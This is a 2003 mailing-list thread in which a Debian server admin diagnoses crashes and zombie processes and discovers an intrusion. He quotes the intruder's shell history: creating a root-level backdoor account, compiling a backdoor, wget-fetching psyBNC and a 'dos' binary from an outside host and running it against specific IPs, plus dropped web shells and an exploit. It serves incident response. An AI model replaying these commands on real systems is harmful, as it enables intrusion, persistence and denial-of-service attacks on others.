[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Strange segmentation faults and Zombies

Laurent Corbes {Caf'} wrote:

On Wed, 17 Sep 2003 22:29:58 +0200
Markus Schabel <markus.schabel@tgm.ac.at> wrote:



I've seen some strange things on my (stable with security-updates)
server: the last apt-get update didn't work because gzip segfaultet.
I've copied gzip from another server over the version on this server,
but it also crashed. Interesting was that the executable was bigger
after the segfault.



curious.



In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
idea where they come from.



it's the daily cronjob that stole.


yes, and that's reproducable :(


You think the server got hacked? Are there any other things that can
lead to this? man also behaves strange, it says either "No manual entry
for...", "What manual page do you want?" or nothing.
i'm thinking about a hardware problem. may the harddrive is in failure (get the ouput of dmesg) or a very big 
ram problem that corrupt files on the hard drive.


request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.

but nothing about the disks


in every case simply copy all the data you can and inspect the hdd in
another box mounting it read only.


setuid.changes lists /dev/* and the following programs:
pppd
postdrop
postqueue
wall
newgrp
at
chage
chfn
chsh
expiry
gpasswd
passwd
write
crontab
dotlockfile
ssh-keysign
procmail
lockfile
popauth
pt_chown
traceroute
mount
umount
login
su
ping
suexec
/usr/lib/mc/bin/cons.saver

and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash

in /etc/.rpn theres a .bash_history with the following content:


id
mkdir /etc/.rpn
ps -aux
ps -aux | grep tbk
kill -15292 pid
kill 15292
netconf
locate httpd.conf
cd /etc/.rpn
ls -al
wget
cd /var/www/cncmap/www/upload/renegade
ls -al
rm -rf phpshell.php
cat bd.c
gcc -o bd bd.c
ftp ftp.hpg.com.br
rm -rf bd.c
cd /tmp
cd /etc/.rpn
wget www.slacks.hpg.com.br/psyBNC.tar.gz
tar zvxf psyBNC.tar.gz
tar -zvxf psyBNC.tar.gz
tar
gunzip psyBNC.tar.gz
tar -Acdtrux psyBNC.tar.gz
tar -x psyBNC.tar.gz
tar -Acd psyBNC.tar.gz
tar -cd psyBNC.tar.gz
tar --help
pwd
ls
rm -rf *
wget www.slacks.hpg.com.br/bin/dos
chmod +x dos
./dos
./dos 200.101.87.8 65535 8569
./dos 200.199.95.11 65535 8569


and the executable dos

interesting is the line "tar --help" :D

in "last" I see the following:


slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)     200-147-107-35.tlm.dialuol.com.br


IP of the hacker is 200.147.107.35
I think we have no chance of legal actions against .br?

in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, LES-EXPLOIT for Linux x86") 
rem.php (phpRemoteView)

so we got hacked :(

what informations should we gather before we reinstall the complete
server? I think we have to reinstall the whole thing or do you have
any ideas?

thanks
Markus
Reply to: